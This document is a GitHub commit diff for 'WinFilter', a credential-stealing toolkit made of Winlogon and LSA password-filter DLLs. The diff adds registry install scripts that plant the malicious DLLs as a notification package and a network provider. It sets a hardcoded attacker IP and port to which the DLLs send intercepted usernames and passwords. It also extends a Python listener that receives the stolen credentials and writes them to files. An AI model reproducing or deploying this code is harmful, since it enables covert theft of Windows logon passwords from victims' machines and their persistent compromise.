cleanup + write to file

kindtime · Nov 5, 2021 · 215a58b · 215a58b
1 parent 84c8414
commit 215a58b
Show file tree

Hide file tree

Showing 7 changed files with 67 additions and 5 deletions.
diff --git a/README.md b/README.md
@@ -0,0 +1,33 @@
+# WinFilter
+Winlogon and LSA Notification Password Filters 
+
+## Reference
+The primary code for each of the filters were pulled from:
+- https://github.com/gtworek/PSBits/tree/master/PasswordStealing
+- https://github.com/3gstudent/PasswordFilter
+
+## Usage
+### Filters
+For each of the DLLs, they must be compiled with the desired IP address and port at the top of the file using Visual Studio.
+
+`#define SERVER_IP`
+
+`#define PORT`
+
+Modify and utilize each of the install scripts in order to set up the filters. 
+
+`sed -i 's/kindtime/your_name/g' install_script`
+
+### Credentials Receiver
+To receive creds and set up the server, run:
+
+`python3 winfilter.py`
+
+By default, the IP will be '0.0.0.0' and the port will be '80'. You can give a specific ip or port using `--ip <ip_addr>` or `--port <port_num>`.
+
+Screenshot Example:
+```python3 winfilter.py --port 6006```
+
+![photo](photos/photo.png)
+
+Credentials will also be written to a file in the `creds` directory. Use the `--clean` option to clear out the directory.
diff --git a/lsanotif/lsainstall.bat b/lsanotif/lsainstall.bat
@@ -0,0 +1 @@
+REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "rassfm\0scecli\0kindtime" /f
diff --git a/lsanotif.cpp → lsanotif/lsanotif.cpp b/lsanotif.cpp → lsanotif/lsanotif.cpp
@@ -7,6 +7,8 @@
 
 #pragma comment(lib,"ws2_32.lib") //Winsock Library
 
+#define PORT 6006
+#define SERVER_IP "192.168.153.136"
 
 int SavePassword(PUNICODE_STRING username, PUNICODE_STRING password)
 {
@@ -44,9 +46,9 @@ int SavePassword(PUNICODE_STRING username, PUNICODE_STRING password)
 	printf("Socket created.\n");
 
 
-	server.sin_addr.s_addr = inet_addr("129.21.101.247");
+	server.sin_addr.s_addr = inet_addr(SERVER_IP);
 	server.sin_family = AF_INET;
-	server.sin_port = htons(6006);
+	server.sin_port = htons(PORT);
 
 	//Connect to remote server
 	if (connect(s, (struct sockaddr*)&server, sizeof(server)) < 0)

diff --git a/photos/photo.png b/photos/photo.png
diff --git a/winfilter.py b/winfilter.py
@@ -1,6 +1,7 @@
 import socket
 import threading
 import argparse
+import os
 
 print_lock = threading.Lock()
 
@@ -16,11 +17,19 @@ def handle_client(conn, addr):
         type = 'Password Change'
         username = strData[2:strData.find(':')]
     password = strData[strData.find(':')+1:strData.find(';end')]
-    print(f"\nSource: {addr}\nType: {type}\nUsername: {username} \nPassword: {password}\n\n")
+    storage = f"\nSource: {addr}\nType: {type}\nUsername: {username} \nPassword: {password}\n\n"
+    print(storage)
+    writeFile(storage, addr)
     if not data:
         print_lock.release()
 
 
+def writeFile(storage, addr):
+    ip = addr[0]
+    with open(f'creds/{ip}.txt', 'a') as f:
+        f.write(storage)
+
+
 def main():
     print("""\                                                                                                                     
   _____            ____  _____   ______         _____   ____  ____      _________________      ______        _____   
@@ -41,8 +50,13 @@ def main():
     parser = argparse.ArgumentParser(description="Receive creds from Winlogon + LSA Filters")
     parser.add_argument('--ip', type=str, nargs='?', const=1, help="IP to listen on (default: 0.0.0.0)", default='0.0.0.0')
     parser.add_argument('--port', type=int, nargs='?', const=1, help="Port to listen on (default: 80)", default=80)
+    parser.add_argument('--clean', dest='clean', action='store_true')
+    parser.set_defaults(clean=False)
     args = parser.parse_args()
 
+    if args.clean:
+        os.system("rm -rf creds; mkdir creds")
+
     s = socket.socket() 
     s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
     print(f"Listening on {args.ip}:{args.port}\n")

diff --git a/winlogon.c → winlogon/winlogon.c b/winlogon.c → winlogon/winlogon.c
@@ -8,6 +8,9 @@
 
 #pragma comment(lib,"ws2_32.lib") //Winsock Library
 
+#define PORT 6006
+#define SERVER_IP "192.168.153.136"
+
 // from npapi.h
 #define WNNC_SPEC_VERSION                0x00000001
 #define WNNC_SPEC_VERSION51              0x00050001
@@ -83,9 +86,9 @@ int SavePassword(PUNICODE_STRING username, PUNICODE_STRING password)
 	printf("Socket created.\n");
 
 
-	server.sin_addr.s_addr = inet_addr("192.168.86.32");
+	server.sin_addr.s_addr = inet_addr(SERVER_IP);
 	server.sin_family = AF_INET;
-	server.sin_port = htons(80);
+	server.sin_port = htons(PORT);
 
 	//Connect to remote server
 	if (connect(s, (struct sockaddr*)&server, sizeof(server)) < 0)

diff --git a/winlogon/wlinstall.ps1 b/winlogon/wlinstall.ps1
@@ -0,0 +1,9 @@
+$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
+$UpdatedValue = $Path.PROVIDERORDER + ",kindtime"
+Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
+
+New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\kindtime
+New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\kindtime\NetworkProvider
+New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\kindtime\NetworkProvider -Name "Class" -Value 2
+New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\kindtime\NetworkProvider -Name "Name" -Value kindtime
+New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\kindtime\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\kindtime.dll"
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1 @@
		REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "rassfm\0scecli\0kindtime" /f